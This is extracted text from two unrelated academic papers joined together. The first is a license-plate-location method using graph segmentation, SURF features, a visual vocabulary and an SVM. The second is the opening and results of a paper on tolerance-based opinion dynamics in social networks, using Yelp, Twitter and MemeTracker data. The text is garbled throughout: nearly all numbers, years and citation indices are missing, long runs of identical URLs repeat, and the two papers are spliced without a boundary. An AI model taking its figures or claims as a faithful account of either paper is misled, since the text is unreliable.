Its value equals the product of the eigenvalues of the Hessian, so the sign of the discriminant can be used to decide whether a point is an extremum. The algorithm replaces the function f(x, y) by the Gaussian-smoothed image L(x, y) and computes the second-order partial derivatives by convolution with specific kernels, which yields the matrix elements L_xx, L_xy and L_yy; from the discriminant, an approximate Hessian-determinant map is obtained. The response of each pixel is compared with its neighbours at the same and adjacent scales of the image pyramid (a three-dimensional neighbourhood), and the maxima are taken as initial feature points. As shown in Figure, a point whose local response is greater than that of the surrounding pixels is a feature point of the region.

Figure: feature points.

To guarantee rotation invariance, the Haar wavelet responses in the x and y directions are summed for all points inside a sector centred on the feature point; points close to the feature point receive a large weight and points far away a small one. Sweeping the sector around the circle yields the main direction of each feature point. This process is shown in Figure.

Figure: determining the main direction.

Although SURF descriptors can describe an image, a single image contains a large number of SURF feature points, and using them directly for classifier training would be computationally expensive. We therefore cluster the descriptor vectors: each cluster represents a visual word, and the SURF feature points are mapped to the codebook generated by the visual word package. In this paper the k-means clustering algorithm is used to construct the visual vocabulary; it is simple, easy to implement and gives good clustering results. Its objective is the sum of squared errors over all clustered objects, where p is a clustering object and c_i is the centroid of cluster C_i:

$$E = \sum_{i=1}^{k}\,\sum_{p \in C_i} \lVert p - c_i \rVert^2$$

The license plate location problem only needs to distinguish plate contours from non-plate contours, so we choose the SVM, a binary classifier. SVM is a machine learning method based on VC-dimension theory and structural risk minimization; it is effective for nonlinear problems and was originally designed for binary classification [ ]. The principle of the SVM is to map the data into a high-dimensional space, find the hyperplane with the largest classification margin in that space, and classify with this hyperplane. In the dual formulation below, (x_i, y_i) are the training samples, l is the number of samples, n is the input dimension, C is the penalty parameter, the α_i are the Lagrange coefficients and K(x_i, x_j) is the chosen kernel function:

$$\max_{\alpha}\; \sum_{i=1}^{l}\alpha_i - \frac{1}{2}\sum_{i,j=1}^{l}\alpha_i\alpha_j\, y_i y_j\, K(x_i,x_j)
\quad \text{s.t.}\;\; 0 \le \alpha_i \le C,\; i=1,\dots,l,\qquad \sum_{i=1}^{l}\alpha_i y_i = 0$$
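The following sketch shows how the bag-of-visual-words pipeline described above (k-means vocabulary, histogram encoding, SVM with a Gaussian kernel) can be wired together with scikit-learn. It is an illustrative reconstruction, not the authors' code; the vocabulary size, penalty C and kernel settings are assumptions.

```python
import numpy as np
from sklearn.cluster import KMeans
from sklearn.svm import SVC

def build_vocabulary(descriptor_sets, n_words=64, seed=0):
    """Stack descriptors from all training images and cluster them into a
    visual vocabulary (one cluster centre per visual word)."""
    all_desc = np.vstack([d for d in descriptor_sets if d is not None])
    return KMeans(n_clusters=n_words, random_state=seed, n_init=10).fit(all_desc)

def bow_histogram(descriptors, vocabulary):
    """Encode one image as a normalized histogram of visual-word frequencies."""
    n_words = vocabulary.n_clusters
    if descriptors is None or len(descriptors) == 0:
        return np.zeros(n_words)
    words = vocabulary.predict(descriptors)
    hist = np.bincount(words, minlength=n_words).astype(float)
    return hist / hist.sum()

def train_plate_classifier(descriptor_sets, labels, n_words=64):
    """labels: +1 for plate regions, -1 for non-plate regions, as in the paper."""
    vocab = build_vocabulary(descriptor_sets, n_words)
    X = np.array([bow_histogram(d, vocab) for d in descriptor_sets])
    clf = SVC(kernel="rbf", C=10.0, gamma="scale")  # Gaussian kernel; C is assumed
    clf.fit(X, labels)
    return vocab, clf
```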
II. The Realization of the Algorithm

A. Extraction of the Suspicious License Plate Regions
A license plate image contains rich information: object shape, size, color, texture and other characteristics. The image is defined as a graph in the sense of graph theory,

$$G = (V, E), \qquad v_i \in V, \qquad e_i = (v_i, v_j) \in E$$

where each vertex v_i is a pixel of the image and the weight of an edge e_i is the gray-level difference (or distance) between the pixels v_i and v_j. A graph-cut algorithm [ ] divides G into a series of disjoint independent subgraphs G'; it relies on the minimum spanning tree (MST) to realize the region segmentation. The largest edge weight inside a segmented region C defines its internal difference,

$$Int(C) = \max_{e \in MST(C,E)} w(e)$$

and the minimum weight of the edges connecting two segmented regions is

$$Dif(C_1, C_2) = \min_{v_i \in C_1,\, v_j \in C_2,\,(v_i,v_j)\in E} w(v_i, v_j)$$

where Dif is taken as infinite if there is no edge between the two parts. The boundary between two regions is then judged by

$$D(C_1, C_2) = \begin{cases} \text{true}, & \text{if } Dif(C_1,C_2) > MInt(C_1, C_2)\\ \text{false}, & \text{otherwise} \end{cases}$$

with the minimum internal difference defined as

$$MInt(C_1, C_2) = \min\bigl(Int(C_1)+\tau(C_1),\; Int(C_2)+\tau(C_2)\bigr)$$

Here τ(·) is a threshold function that controls the degree of merging, defined as τ(C) = k/|C|, where |C| is the number of vertices of the segment and k is a parameter controlling the coarseness of the image segmentation. Using this graph-cut algorithm, a preliminary region segmentation of the image is performed; the result is shown in Figure.

Figure: image segmentation, (a) and (b).

Objects in the image are hierarchical, so after the initial segmentation the regions are merged according to four similarity measures:

1) Color similarity. For each color channel a normalized histogram with a fixed number of bins is computed, so every region is expressed as an n-dimensional color vector. The color similarity, and the color vector of a merged region, are

$$s_{colour}(r_i, r_j) = \sum_{k=1}^{n} \min(c_i^{k}, c_j^{k}), \qquad c_t = \frac{size(r_i)\,c_i + size(r_j)\,c_j}{size(r_i) + size(r_j)}$$

2) Texture similarity. Gaussian derivatives are computed in eight directions for each color channel; the normalized histograms over all channels and directions give an n-dimensional texture vector for each region, and

$$s_{texture}(r_i, r_j) = \sum_{k=1}^{n} \min(t_i^{k}, t_j^{k})$$

3) Size similarity. This refers to the number of pixels of the regions, so that small regions are merged with priority:

$$s_{size}(r_i, r_j) = 1 - \frac{size(r_i) + size(r_j)}{size(im)}$$

4) Fill similarity. Region pairs whose joint bounding box BB_ij is tighter receive a higher score:

$$s_{fill}(r_i, r_j) = 1 - \frac{size(BB_{ij}) - size(r_i) - size(r_j)}{size(im)}$$

The four similarities are combined into the similarity set S with

$$s(r_i, r_j) = a_1 s_{colour}(r_i, r_j) + a_2 s_{texture}(r_i, r_j) + a_3 s_{size}(r_i, r_j) + a_4 s_{fill}(r_i, r_j), \qquad a_i \in \{0, 1\}$$

The pair of regions r_i and r_j with the largest similarity in the collection S is then selected.
The two regions are merged into a new region r_t, and the similarities between r_i, r_j and their neighbouring regions are removed from the collection S. The similarities between the newly generated region r_t and its adjacent regions are then computed and added to S, r_t is added to the region collection R, and a rectangular box is used to mark the area. The suspicious regions extracted by this algorithm for a vehicle image are shown in Figure.

Figure: extraction of the suspicious regions.

B. Location of the License Plate
1) The image pixels are substituted into the Hessian formulation above; at scale σ the Hessian matrix becomes

$$H(x, \sigma) = \begin{bmatrix} L_{xx}(x,\sigma) & L_{xy}(x,\sigma) \\ L_{xy}(x,\sigma) & L_{yy}(x,\sigma) \end{bmatrix}$$

where L_xx, L_xy and L_yy are the convolutions of the image with the second-order derivatives of the Gaussian filter.

2) On the original image, box filters of increasing size are used to form the different scales of the image pyramid. An example box filter template is shown in Figure; the grey parts of the template approximate the corresponding second-order Gaussian derivative at the corresponding scale. After convolution, the values D_xx, D_yy and D_xy are obtained and the approximate Hessian determinant is

$$\det(H_{approx}) = D_{xx} D_{yy} - \left(w\, D_{xy}\right)^2$$

where w is a relative weight (0.9 in the original SURF formulation).

Figure: box filter templates for the (a) x direction, (b) y direction and (c) xy direction.

3) The scale-space image pyramid is built. In every octave, four layers (scales) of the image are chosen; the construction parameters of the octaves are shown in Figure, where the grey numbers are the sizes of the box filter templates. If the image is larger than the template size, the number of octaves is increased; for a filter template of size N × N the corresponding scale grows proportionally with N. The Hessian determinant is used to calculate the extrema, and non-maximum suppression is applied in a three-dimensional neighbourhood: if a point's response is larger (or smaller) than those of its neighbours at the previous scale, the next scale and the surrounding positions at its own scale, it is a candidate feature. Interpolation in scale space and image space then yields the stable feature point locations and their scale values.

Figure: the filter size per octave.

4) With the feature point as the centre and s its scale value, the Haar wavelet responses in the x and y directions are computed for the points within a radius proportional to s. The responses are weighted with a Gaussian coefficient, so that contributions near the feature point are large and those far away are small. The responses within a sliding angular window are summed to form a vector; traversing the entire circle, the longest vector gives the principal direction of the feature point, as shown in Figure.

5) The coordinate axes are rotated to the main direction, and a square window with side length proportional to s is selected along it. The window is divided into sub-regions, and the wavelet responses dx and dy are computed within each sub-region. The responses and their absolute values are summed to form Σdx, Σdy, Σ|dx| and Σ|dy|, so each sub-region contributes a four-dimensional vector (Σdx, Σdy, Σ|dx|, Σ|dy|), and each feature point is described by the concatenated and normalized descriptor vector. The extraction results are shown in Figure.

Figure: generated SURF feature points. Figure: SURF feature points.
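To give a feel for the blob response used in step 2, the rough sketch below approximates the second-order derivatives with differences of box means and combines them into the determinant expression. Real SURF uses integral images and the exact lobe layout from the original formulation; the filter sizes, the lobe construction and the 0.9 weight here are simplified assumptions for illustration only.

```python
import numpy as np
from scipy.ndimage import uniform_filter

def box_hessian_response(gray, box_size=9, weight=0.9):
    """Crude approximation of the SURF blob response det(H) ~ Dxx*Dyy - (w*Dxy)^2,
    built from shifted box means instead of proper integral-image box filters."""
    g = gray.astype(float)
    third = max(box_size // 3, 1)
    mean = uniform_filter(g, size=third)                   # local box mean
    dxx = np.roll(mean, -third, 1) - 2 * mean + np.roll(mean, third, 1)
    dyy = np.roll(mean, -third, 0) - 2 * mean + np.roll(mean, third, 0)
    dxy = (np.roll(np.roll(mean, -third, 0), -third, 1)
           - np.roll(np.roll(mean, -third, 0), third, 1)
           - np.roll(np.roll(mean, third, 0), -third, 1)
           + np.roll(np.roll(mean, third, 0), third, 1)) / 4.0
    return dxx * dyy - (weight * dxy) ** 2                 # high values = blob-like points
```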
After the SURF feature points are extracted, the k-means clustering algorithm is used to generate the visual vocabulary [ ]. Let the SURF descriptors collected from the training library be x^(1), ..., x^(m). The generation process is as follows:
a) select k cluster centroids μ_1, ..., μ_k;
b) assign each sample to the nearest centroid, c^(i) := argmin_j ||x^(i) − μ_j||², recompute every centroid μ_j as the mean of the samples assigned to it, and repeat both steps until convergence.

Training of the classifier. Every picture of the training set is expressed through the visual vocabulary: the SURF feature points of the image are extracted and mapped to the corresponding visual words to generate the code (histogram) of the picture, which is then fed to the SVM. The training process is:
a) give each sample x^(i) a label y_i: license plate samples are labelled +1 and non-plate samples −1;
b) select the Gaussian kernel as the mapping onto the higher-dimensional space, with σ controlling the projection and the penalty factor C optimizing the decision surface;
c) substitute all the samples into the soft-margin formulation

$$\min_{w,\, b,\, \xi}\; \frac{1}{2}\lVert w\rVert^2 + C\sum_{i=1}^{l}\xi_i \quad \text{s.t.}\;\; y_i\,(w\cdot x_i + b) \ge 1 - \xi_i,\;\; \xi_i \ge 0$$

and obtain the classification decision function.

In the recognition phase, the image is turned into a vector through the visual vocabulary, and the trained SVM classifier decides whether it is a license plate region, thereby locating the plate.

III. Conclusion
To deal with overlapping objects in the image, a graph-based search algorithm is used to obtain the suspicious license plate regions of the vehicle image. SURF feature points are extracted from the coarsely positioned rectangular contour regions, the candidate images are represented against the generated bag-of-visterms codebook, and the decision function obtained by SVM training classifies the rectangular regions to locate the license plate. The method achieves a higher recognition rate and strong robustness to interference under complex backgrounds: on the collected photos its accuracy is . %.

References
[ ] Zhiqiang Li, Yongbin Li. The development and research status of license plate recognition technology. Science & Technology Information.
[ ] Geng Qing-tian, Zhao Hong-wei. License plate recognition based on fractal and hidden Markov feature. Optics and Precision Engineering.
[ ] Qin Zhong, Shi Shengli, Xu Jianmin, et al. Method of license plate location on corner feature. In: Proceedings of the World Congress on Intelligent Control and Automation. Piscataway, NJ, USA: IEEE Press.
[ ] Guo Z Q, Wang Y J, Dong Z, et al. License plate detection method based on paired morphological operator. In: Proceedings of the National Conference on Image and Graphics. Beijing: Tsinghua University Press.
[ ] Zhang Yin, Pan Yunhe. A new approach for vehicle license plate locating from color image. Journal of Image and Graphics.
[ ] Zheng L H, He X J, Samali B, et al. An algorithm for accuracy enhancement of license plate recognition. Journal of Computer and System Sciences.
[ ] Qiwei Wang, Shouhong Wan, Lihua Yue, Che Wang. Visual attention based bag-of-words model for image classification.
Sixth International Conference on Digital Image Processing.
[ ] Corinna Cortes, Vladimir Vapnik. Support-vector networks. Machine Learning.
[ ] He Chunhua, Zhang Xuefei, Hu Yingchun. A study on the improved algorithm for Sobel on image edge detection. Optical Technique.
[ ] A. Bolovinou, I. Pratikakis, S. Perantonis. Bag of spatio-visual words for context inference in scene classification. Pattern Recognition.

Tolerance-Based Interaction: A New Model Targeting Opinion Formation and Diffusion in Social Networks
Alexandru Topirceanu, Mihai Udrescu, Mircea Vladutiu and Radu Marculescu
Department of Computer and Software Engineering, Politehnica University Timisoara, Timisoara, Romania; Department of Electrical and Computer Engineering, Carnegie Mellon University, Pittsburgh, PA, United States
Submitted August, accepted December, published January. Corresponding author: Mihai Udrescu, mudrescu@cs.upt.ro, mudrescu@gmail.com. Academic editor: Filippo Menczer. Copyright Topirceanu et al., distributed under Creative Commons CC-BY. Open access.

Abstract
One of the main motivations behind social network analysis is the quest for understanding opinion formation and diffusion. Previous models have limitations, as they typically assume opinion interaction mechanisms based on thresholds which are either fixed or evolve according to a random process that is external to the social agent. Indeed, our empirical analysis on large real-world datasets such as Twitter, MemeTracker, and Yelp uncovers previously unaccounted-for dynamic phenomena at population level, namely the existence of distinct opinion formation phases and social balancing. We also reveal that a phase transition from an erratic behavior to social balancing can be triggered by network topology and by the ratio of opinion sources. Consequently, in order to build a model that properly accounts for these phenomena, we propose a new (individual-level) opinion interaction model based on tolerance.
As opposed to the existing opinion interaction models, the new tolerance model assumes that an individual's inner willingness to accept new opinions evolves over time according to basic human traits. Finally, by employing discrete event simulation on diverse social network topologies, we validate our opinion interaction model and show that, although the network size and opinion source ratio are important, the phase transition to social balancing is mainly fostered by the democratic structure of the small-world topology.

Subjects: Network Science and Online Social Networks, Scientific Computing and Simulation, Social Computing
Keywords: social networks, opinion diffusion, phase transition, discrete event simulation, tolerance

Introduction
Social network analysis is crucial to better understand our society, as it can help us observe and evaluate various social behaviors at population level. In particular, understanding social opinion dynamics and personal opinion fluctuation (Golbeck; Geven, Weesie & van Tubergen; Valente et al.) plays a major part in fields like social psychology, philosophy, politics, marketing, finances and even warfare (Easley & Kleinberg; Pastor-Satorras & Vespignani; Fonseca). Indeed, the dynamics of opinion fluctuation in a community can reflect the distribution of socially influential people across that community (Kempe, Kleinberg & Tardos; Hussain et al.; Muchnik, Aral & Taylor); this is because social influence is the ability of individuals (agents) to influence others' opinion in either one-on-one or group settings (Maxwell; Wang & Chen; McDonald & Wilson). Without social influence, the society would have an erratic behavior which would be hard to predict. Existing studies on opinion formation and evolution (Axelrod; Riolo, Cohen & Axelrod; Acemoglu et al.; Yildiz et al.; Valente et al.; Hussain et al.; Guille et al.; Ruan et al.) rely on the contagion principle of opinion propagation. However, such studies offer limited predictability and realism because they are generally based on opinion interaction models which use either fixed thresholds (Deffuant et al.; Javarone & Squartini) or thresholds evolving according to simple probabilistic processes that are not driven by the internal state of the social agents (Fang, Zhang & Thalmann; Deng, Liu & Xiong). To mitigate these limitations, we reveal new dynamical features of opinion spreading. The consistent and recurring real-world observations are then explained by introducing a new social interaction model which takes into account the evolution of the individual's inner state. We finally validate the proposed model by analyzing empirical data from Yelp, Twitter and MemeTracker, and by using our opinion dynamics simulation framework SocialSim (Topirceanu & Udrescu; available at cs.upt.ro/~alext/socialsim),
which includes multiple complex topological models, as well as customizable opinion interaction and influence models. Consequently, our main contributions are threefold:

1. Identification of four distinct phases in opinion formation. This aspect is not entirely captured by existing models (Sznajd-Weron & Sznajd; Li et al.; Acemoglu et al.; Chen, Wang & Li; Guille et al.; Fang, Zhang & Thalmann), although previous research (Hołyst, Kacperski & Schweitzer) has noticed that there are some stages in opinion evolution. We argue that the succession of opinion formation phases is critical to the social balancing phenomenon (i.e., the general opinion becomes stable despite constant local oscillations). We also identify a phase transition from an unstable opinion to social balancing which is related to the dynamics of the opinion formation phases.

2. Modeling opinion dynamics. We propose a new graph- and threshold-based interaction model with stubborn agents (SA) (Acemoglu & Ozdaglar) which is able to reproduce the phenomena that we observe in real-world datasets. Inspired by social psychology, our new model assumes that an individual's willingness to accept new opinions (i.e., tolerance) changes over time according to his/her inner state.

3. Validation of the newly proposed tolerance model via our discrete-event simulator SocialSim (Topirceanu & Udrescu). The analysis we provide reveals the deep connection between social balancing and the relevant parameters of social networks such as network size, topology, and opinion source ratio (i.e., stubborn agent distribution) (Acemoglu et al.); this correlates well with our empirical observations on large social networks.

Taken together, these new contributions show that opinion dynamics in social networks exhibit specific patterns that depend on network size and the ratio of stubborn agents (which
one can obtain insights on the popularity of a business at a given time. the usable information is the number of reviews at a given moment in time (interpreted as network size of individuals with an opinion), the average grade in time (the average opinion over time), and the number of votes to each review (ratio of agents with strong or “stubborn” opinions, because when an agent votes, his opinion is already made up). the dataset contains , users, , businesses and , , reviews. out of this data, we processed and filtered businesses with at least reviews (i.e., we need a significant number of reviews for a relevant dynamical analysis). as such, we obtained , businesses for further analysis. memetracker and twitter hashtags with time information from the stanford large network dataset collection (snap); which contain the history (repost rate in time) of diverse, popular hashtags. we can use this data to analyze the evolution of a particular opinion in time. memetracker phrases are the , highest total volume phrases among million phrases collected within – . twitter hashtags are the , highest total volume hashtags among million hashtags from jun–dec . we filtered the twitter and memetracker data so that only the memes or hashtags which can be related to opinions remain, e.g., we have excluded those related to rare events like natural disasters. as such, we rendered a number of re-tweets and hashtags for further processing. discrete simulation methodology we test and validate our new opinion interaction model based on tolerance with the java-based opinion dynamics simulator socialsim (topirceanu & udrescu, ). like any discrete event simulation, we define the salient properties of the experimental setup which was used to obtain the simulation results. events are synchronized by the simulation clock; we call the period of this clock a simulation day. one day is a simulation period in which agents can interact with their neighbors. however, an agent does not inter- act daily; in fact, each agent picks a random number of days to be inactive after each active day. in our simulation, we use a random timeout interval between day and days. only after this time has elapsed, will an agent interact again with one random neighbor. after that interaction, the agent will again choose to be inactive for a random period of days. results by analyzing data on opinion evolution using twitter and memetracker hashtags, as well as user reviews and votes for local businesses from yelp, we identify unique temporal patterns in all these datasets. when defining phases of opinion dynamics, we are tracking topirceanu et al. ( ), peerj comput. sci., doi . /peerj-cs. 
/ https://peerj.com/computer-science/ https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://snap.stanford.edu/data/volumeseries.html https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset https://www.yelp.com/dataset_challenge/dataset 
results
by analyzing data on opinion evolution using twitter and memetracker hashtags, as well as user reviews and votes for local businesses from yelp, we identify unique temporal patterns in all these datasets. when defining phases of opinion dynamics, we track the opinion change of the social networks, denoted as ω. for yelp there is a clear link between the opinion state of the participants (denoted as s) and the number of stars awarded by the users. we also assume that yelp users are agents in a social network with a typical structure; this underlying social network influences opinion dynamics in yelp. as such, opinion change is simply the variation in time of the stars awarded by users: ω = s(t) − s(t − 1). for the twitter and memetracker datasets, we interpret the number of replies as a proxy for opinion strength, e.g., more replies indicate a stronger opinion. when previously unopinionated people reply or re-tweet, they do so because they have formed a clear opinion on a particular subject (say, reflected in a hashtag) and they feel the need to express it publicly. as such, the assumption is that we can interpret the change in the number of people that retweet or reply to a hashtag as representing the opinion change ω.
opinion formation phases and social balancing
using the yelp context, we explain how the opinion formation phases (i-initiation, f-fusion, t-tolerance and t-intolerance) are detected. for each business, we have automatically detected all spikes in the number of total votes (interpreted as opinion sources which never change their state, or stubborn agents sa) and have corroborated these with the point at which the state (average stars) has a variation of less than 1 star between the maximum and minimum stars awarded. the reason for considering this variation interval is that 1 star is the psychological threshold represented by the unit of measurement. using an algorithmic description, we give the pseudocode for detecting three points of interest—a (spike in sa concentration just before the convergence of the state), b (start of convergence of the state), and c (spike in opinion change just after the spike in sa).
algorithm for detecting b (start of convergence in stars on the ox-axis):
find tb so that maximum(s(k)) − minimum(s(k)) < 1 for all tb ≤ k < tmax; assign b(tb, s(tb)).
algorithm for detecting a (spike in sa just before the convergence of stars):
find spike[] := list of all local maximums in the number of total votes; find spike[ta] so that ta < tb (the last spike before tb); assign a(ta, sa(ta)).
algorithm for detecting c (spike in opinion change just after the spike in sa):
find spike[] := list of all local maximums in the opinion change; find spike[tc] so that tb < tc (the first spike after tb); assign c(tc, ω(tc)).
(a compact script that follows these steps is sketched below, after the phase definitions.)
by automatically performing this methodology on all businesses, we find that the average distance between the closest spike on the time axis ox (point a in the example from fig. ), which occurred before the convergence of stars (i.e., point b in fig. , where the variation of awarded stars becomes lower than 1 star), is dconv = . time units. the distance dconv is relatively small with respect to the observation interval of time units or days, suggesting that spikes in sa trigger a (shortly delayed) convergence of stars. further, we show that the spike in sa (point a) also triggers a maximum spike in the opinion change (point c). by running this methodology on all businesses, we obtain an average distance between the spike in sa and the maximum spike in opinion change of dfusion = . time units. these statistical results support the fact that spikes in sa trigger a maximum spike in opinion change. moreover, when we corroborate the average delays between the spike in sa and the spikes in stars and opinion change, namely . and . time units, we can conclude that the convergence of opinion and the fusion phase are distanced, on average, by only dcorr = . time units. backed up by this data, we can state that the convergence of opinion (point b) and the triggering of the fusion phase (point c) are closely correlated. apart from the above statistical analysis, in order to improve the readability of our insight, we also present an illustrative example. as such, in fig. , the phase transition happens at ox = (point a) as the spike in the total votes (green line) coincides with a delayed stabilization (point b) of the average stars awarded (blue line). the triggered spike in opinion change is marked with point c. we also extend our interpretation of yelp dynamics in terms of opinion change ω by presenting some relevant examples from the twitter and memetracker datasets. figure illustrates a few cases of memes that can be related to users' opinions about, for instance, beyonce's song ("single ladies put a ring on it"), a movie ("where the wild things are"), or the significance of an election outcome (#iranelections). inspired by a similar approach on twitter data (lehmann et al., ), we have conducted a statistical analysis on all three datasets. using all datasets from twitter ( hashtags), memetracker ( keywords) and yelp ( businesses), we have algorithmically detected the following characteristic phases in the opinion dynamics:
1. fusion (2nd phase) is the spike centered around the previously detected point c(tc, ω(tc)), with tc being the time projection and ω(tc) the corresponding opinion change of point c. for convenience, we will refer to the local spike in opinion change ω(tc) as fs (fusion spike).
2. initiation (1st phase): starting from time k = 0 (on the ox-axis), find 0 ≤ k < tc so that ω(k) < 0.5 · fs and ω(k + 1) > 0.5 · fs. in other words, time k represents the first point at which the opinion change ω exceeds 50% of the fusion spike fs. we have used this threshold value because it represents the half amplitude of the fusion phase, which it precedes.
3. intolerance (4th phase): starting from time k = tmax (the highest registered time on the ox-axis), find tc < k < tmax so that ω(k) < 0.5 · fs and ω(k − 1) > 0.5 · fs. in other words, time k represents the first point, from end to beginning of time, at which ω exceeds 50% of the fusion spike. we consider that a social network reaches intolerance if the tolerance θ < 0.5, so we use the 50% threshold for opinion change. any higher than 50%, and opinion change is still in the tolerance phase; any lower, and opinion change is likely to converge towards 0.
4. tolerance (3rd phase): starting from time k = tc + 1 (start of social balance), find tc < k < tmax so that ω(k) > 0.5 · fs and ω(k + 1) < 0.5 · fs (end of social balance). in other words, time k represents the point at which ω decreases below the 50% threshold, which we consider a transition into the intolerance phase.
figure (representative example for the evolution of review count and review votes for a popular business on yelp): (a) the ratio of review votes with respect to the review count, represented with the green line, is interpreted as stubborn agent sa (or opinion source) concentration. (b) the average user-defined popularity of the respective business over the same period of time represents the state of the social network. (c) the variation of the stars (blue) is represented with orange and is interpreted as the participants' opinion change ω. point a depicts the sa concentration spike which triggers the delayed convergence in opinion (point b) and the spike in opinion change (point c).
figure (evolution of replies/retweets, i.e., opinion change ω, for some representative hashtags containing user-expressed opinion): (a) memetracker. both tags exhibit the fusion phase f (opinion spike), then slowly converge towards intolerance; one tag exhibits a second spike after the f phase, then enters the intolerance phase. (b) twitter. one tag exhibits the fusion phase f (first opinion spike), then oscillates during the tolerance phase t, keeping social balance. the other tag shows an example of convergence towards the intolerance phase, as social balancing does not occur.
figure displays the popularity of two hashtags on memetracker and twitter, expressed as a posts/time evolution (posts are replies and tweets).
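as referenced above, the following is a small python/numpy sketch of this detection procedure (points a, b, c and the 50%-of-fusion-spike phase boundaries); the function names and the simple local-maximum test are illustrative assumptions rather than the original analysis code, and the inputs are assumed to be equally spaced time series.

import numpy as np

def local_maxima(x):
    # indices of simple local maxima of a 1-d series
    return [k for k in range(1, len(x) - 1) if x[k - 1] < x[k] >= x[k + 1]]

def detect_points(stars, votes, conv_band=1.0):
    """detect b (start of convergence of stars), a (last votes spike before b)
    and c (first opinion-change spike after b), following the pseudocode above."""
    stars = np.asarray(stars, dtype=float)
    votes = np.asarray(votes, dtype=float)
    omega = np.abs(np.diff(stars))          # opinion change, |s(t) - s(t-1)|
    # b: first tb after which the stars vary by less than one star
    tb = next((t for t in range(len(stars))
               if stars[t:].max() - stars[t:].min() < conv_band), len(stars) - 1)
    # a: last spike in the total votes (sa concentration) before tb
    ta = max((k for k in local_maxima(votes) if k < tb), default=None)
    # c: first spike in the opinion change after tb
    tc = min((k for k in local_maxima(omega) if k > tb), default=None)
    return ta, tb, tc, omega

def phase_boundaries(omega, tc):
    """initiation and intolerance onsets at 50% of the fusion spike fs = omega[tc]."""
    fs = omega[tc]
    start = next((k for k in range(tc) if omega[k] < 0.5 * fs <= omega[k + 1]), 0)
    end = next((k for k in range(len(omega) - 1, tc, -1)
                if omega[k] < 0.5 * fs < omega[k - 1]), len(omega) - 1)
    return start, end   # initiation onset, intolerance onset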
based on the observed fluctuations, we identify the following phases in opinion formation: an initiation phase (i) when new opinions are injected into the social network and the number of replies starts to increase rapidly; a fusion phase (f) when the opinion dynamics reaches a maximum and different opinions start to collide; a tolerance phase (t) which represents a fluctuating yet convergent behavior; and, occasionally, an intolerance phase when the fluctuations of opinion decrease and converge towards zero. based on network topology and/or the ratio of opinion sources, the diffusion process may reach the fourth phase of intolerance. opinion sources, or stubborn agents (acemoglu, ozdaglar & yildiz, ; acemoglu et al., ), are agents within the social network (i.e., twitter or yelp users) who try to instill a certain opinion by influencing their peers; they are represented by those people within the network who hold strong opinions that do not change over time. the concentration of opinion sources is expressed as their ratio relative to the entire population. additionally, the analysis of the twitter and memetracker results in fig. shows that all tags exhibit a clear f phase (first spike). in fig. b, one tag converges towards intolerance, while the other tag enters a balanced oscillation (tolerance phase), which supports the empirical observation of a phenomenon that we call social balancing, i.e., oscillations of individuals' opinion at the microscopic scale become stable and predictable at the macroscopic scale of the society. as such, social balancing is defined as the succession of the i − f − t (tolerance) phases, whereas social imbalance occurs if either the society does not reach the tolerance phase or, after reaching it, decays into the intolerance phase. for example, the tag #iranelections in fig. b has a shorter, more abrupt oscillation. in this case, we consider that the number of opinion sources is not high enough (i.e., above a critical threshold) for social balancing to happen. this tag is an example of social imbalance with a decisive crystallization of just one opinion, as there is no tolerance phase. the averages of opinion change obtained for each considered dataset and for each phase are the following (their representation is given in fig. ); within square brackets are the minimum, maximum and standard deviation for each statistical average:
• twitter: initiation starts at ox = and ends at ox = [ , , . ], and has an average amplitude oy = % [ %, %, . ]. fusion happens at ox = and has an amplitude of % (i.e., it represents the maximum spike). tolerance starts on average at ox = ( , end of time series, . ), and has an average amplitude oy = % [ %, %, . ]. intolerance starts on average at ox = ( , end of time series, . ), and has an average amplitude oy = % [ %, %, . ].
